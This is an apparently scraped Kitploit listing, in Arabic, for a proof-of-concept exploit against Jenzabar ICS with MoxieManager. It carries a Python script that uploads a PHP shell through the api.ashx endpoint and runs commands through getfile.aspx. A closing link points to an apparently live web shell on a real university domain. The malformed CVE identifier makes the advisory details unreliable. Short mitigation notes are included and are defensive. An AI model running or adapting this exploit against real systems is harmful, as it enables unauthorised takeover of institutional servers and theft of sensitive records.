Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ICS-MoxieManager-FileUpload-PoC — CVE-2026-30-03 9.8 (حرج) ثغرة RCE محتملة في Jenzabar ICS + MoxieManager | Kitploit
أدوات/GitHubGitHub/itsismarcos/ics-moxiemanager-fileupload-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقتطوير الحمولات
GitHubitsismarcos/ics-moxiemanager-fileupload-poc

ICS-MoxieManager-FileUpload-PoC

CVE-2026-30-03 9.8 (حرج) ثغرة RCE محتملة في Jenzabar ICS + MoxieManager

عرض المستودع
14منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ICS-MoxieManager-RCE-CVE-2026-30-03

CVE-2026-30-03 9.8 (حرج) إمكانية RCE في Jenzabar ICS + MoxieManager

proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be

CVE CVSS التأثير المتأثر CVE-2026-30-03 9.8 (حرج) إمكانية RCE Jenzabar ICS + MoxieManager

ثغرة أمنية في مكوّن MoxieManager المستخدم في نظام Jenzabar ICS قد تسمح برفع ملفات بشكل غير لائق، والتي، في ظل ظروف معينة، يمكن الوصول إليها علنًا وقد تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE). الوصف الفني

تحدث المشكلة بسبب:

عدم وجود تحقق مناسب من الملفات المرفوعة

احتمال تعرض الملفات عبر نقطة نهاية عامة:

/ICS/staticpages/getfile.aspx

تحكم غير متناسق في المصادقة على نقطة النهاية:

/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx

في سيناريوهات محددة، قد يتم تخزين الملفات المرفوعة في أدلة يمكن الوصول إليها واسترجاعها لاحقًا.

التأثير رفع ملفات تعسفي تعرض محتوى حساس احتمال تنفيذ التعليمات البرمجية عن بُعد (اعتمادًا على تكوين الخادم) اختراق كامل للنظام

التصنيف CVSS v3.1: 9.8 (حرج) المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-434: رفع ملف بدون قيود CWE-284: تحكم غير مناسب في الوصول

PoC Exploit

#!/usr/bin/env python3

CVE-2026-30-03 PoC - ICS MoxieManager RCE

import requests

TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

1. Upload PHP Shell

files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}

r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")

2. Execute

SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)

الأنظمة المتأثرة (33+ مؤكد)

المعالجة فورية (تخفيف):

  1. DELETE /moxiemanager/files/users/*/shell.php

  2. تقييد getfile.aspx:

  3. RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]

  4. تعطيل رفع الملفات في MoxieManager

Prof https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443

تنزيل الأداة